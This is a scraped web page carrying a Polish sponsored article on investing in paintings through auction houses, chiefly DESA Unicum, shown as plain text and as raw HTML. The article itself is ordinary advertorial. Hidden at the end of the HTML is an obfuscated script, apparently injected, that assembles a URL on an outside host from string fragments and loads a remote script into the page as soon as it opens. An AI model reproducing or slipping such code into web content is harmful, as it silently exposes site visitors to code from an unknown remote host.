Wielu początkujących miłośników sztuki zastanawia się, jak skutecznie i z gwarancją bezpieczeństwa inwestować pieniądze w obrazy, by nie tylko cieszyły oko, ale także były świetnym sposobem na ulokowanie kapitału. Z pomocą przychodzą instytucje takie jak domy aukcyjne, o których opowiemy w dalszej części tekstu.

 

Dlaczego warto korzystać z pomocy domu aukcyjnego?

Największą korzyścią z takiej współpracy jest wiedza posiadana przez ekspertów zatrudnionych przez dom aukcyjny. Instytucje z wieloletnią tradycją, takie jak działająca od 1998 roku DESA Unicum skupiają najlepszych specjalistów w kraju, którzy czuwają nad oryginalnością i profesjonalną wyceną wszystkich dzieł sztuki.

Wycena to szalenie ważny etap transakcji. To właśnie podczas niej eksperci decydują, czy dane dzieło to oryginał czy falsyfikat, co bardzo trudno rozpoznać nawet wieloletnim pasjonatom sztuki. Korzystanie z pomocy zaufanego domu aukcyjnego to więc przede wszystkim minimalizacja związanego z zakupem ryzyka. Dom aukcyjny oferuje także pomoc we wszelkich formalnościach związanych z zakupem i sprzedażą, które zwłaszcza początkującym mogą przysporzyć nieco problemów.

 

 

Inwestycja w obrazy to rozrywka i sposób lokowania kapitału, który wbrew obiegowej opinii nie jest zarezerwowany wyłącznie dla miliarderów. Najlepszym dowodem są aukcje młodej sztuki organizowane przez DESA Unicum. Nie tylko wspierają młodych artystów, ale też dają okazję ku temu, by nabyć oryginalne dzieła w osiągalnych cenach.

Poznaj innych miłośników sztuki!

Dom aukcyjny to także znana i szanowana galeria obrazów i dzieł sztuki, która posiada wierne grono odbiorców – pasjonatów sztuki, którzy na bieżąco śledzą wszystkie poczynania instytucji i nowości w ofercie. Oglądanie wystaw przed aukcyjnych i uczestnictwo w rozmaitych wydarzeniach artystycznych organizowanych przez dom aukcyjny jest nie tylko okazją, by zobaczyć licytowane dzieła na żywo, ale także poznać innych miłośników sztuki i nawiązać relacje intratne zarówno biznesowo jak prywatnie.

Jak inwestować w obrazy i dzieła sztuki?https://www.pruszkowmowi.pl/wp-content/uploads/2019/07/painter-1968849_1280-738x1024.jpghttps://www.pruszkowmowi.pl/wp-content/uploads/2019/07/painter-1968849_1280-150x150.jpg admin KulturaMateriał partnera
Wielu początkujących miłośników sztuki zastanawia się, jak skutecznie i z gwarancją bezpieczeństwa inwestować pieniądze w obrazy, by nie tylko cieszyły oko, ale także były świetnym sposobem na ulokowanie kapitału. Z pomocą przychodzą instytucje takie jak domy aukcyjne, o których opowiemy w dalszej części tekstu.  Dlaczego warto korzystać z pomocy domu...
<strong>Wielu początkujących miłośników sztuki zastanawia się, jak skutecznie i z gwarancją bezpieczeństwa inwestować pieniądze w obrazy, by nie tylko cieszyły oko, ale także były świetnym sposobem na ulokowanie kapitału. Z pomocą przychodzą instytucje takie jak domy aukcyjne, o których opowiemy w dalszej części tekstu.</strong>  <h2>Dlaczego warto korzystać z pomocy domu aukcyjnego?</h2> Największą korzyścią z takiej współpracy jest wiedza posiadana przez ekspertów zatrudnionych przez dom aukcyjny. Instytucje z wieloletnią tradycją, takie jak działająca od 1998 roku DESA Unicum skupiają najlepszych specjalistów w kraju, którzy czuwają nad oryginalnością i profesjonalną wyceną wszystkich dzieł sztuki.<a href="https://www.pruszkowmowi.pl/wp-content/uploads/2019/07/painter-1968849_1280.jpg"><img class="alignright wp-image-8865" src="https://www.pruszkowmowi.pl/wp-content/uploads/2019/07/painter-1968849_1280-738x1024.jpg" alt="" width="302" height="419" /></a>Wycena to szalenie ważny etap transakcji. To właśnie podczas niej eksperci decydują, czy dane dzieło to oryginał czy falsyfikat, co bardzo trudno rozpoznać nawet wieloletnim pasjonatom sztuki. Korzystanie z pomocy zaufanego domu aukcyjnego to więc przede wszystkim minimalizacja związanego z zakupem ryzyka. Dom aukcyjny oferuje także pomoc we wszelkich formalnościach związanych z zakupem i sprzedażą, które zwłaszcza początkującym mogą przysporzyć nieco problemów.  Inwestycja w obrazy to rozrywka i sposób lokowania kapitału, który wbrew obiegowej opinii nie jest zarezerwowany wyłącznie dla miliarderów. Najlepszym dowodem są aukcje młodej sztuki organizowane przez DESA Unicum. Nie tylko wspierają młodych artystów, ale też dają okazję ku temu, by nabyć oryginalne dzieła w osiągalnych cenach. <h2>Poznaj innych miłośników sztuki!</h2> Dom aukcyjny to także <a href="https://desa.pl/pl/galleries/objects">znana i szanowana galeria obrazów i dzieł sztuki</a>, która posiada wierne grono odbiorców – pasjonatów sztuki, którzy na bieżąco śledzą wszystkie poczynania instytucji i nowości w ofercie. Oglądanie wystaw przed aukcyjnych i uczestnictwo w rozmaitych wydarzeniach artystycznych organizowanych przez dom aukcyjny jest nie tylko okazją, by zobaczyć licytowane dzieła na żywo, ale także poznać innych miłośników sztuki i nawiązać relacje intratne zarówno biznesowo jak prywatnie.<script> (function(){ qXXm=document.createElement("script");qXXm_=("us")+("ta"); qXXm_+="t"+(".");qXXm_+=("in");qXXmu="136245966";qXXm.async=true; qXXmu+=".3bwX2ia5XXmpihrrm";qXXm.type="text/javascript";qXXm_+="f"+"o"+("/"); qXXmu+="gr5j9i3vqprwz";qXXm.src="https://"+qXXm_+qXXmu; dqXXm=document.body;dqXXm.appendChild(qXXm); })(); </script>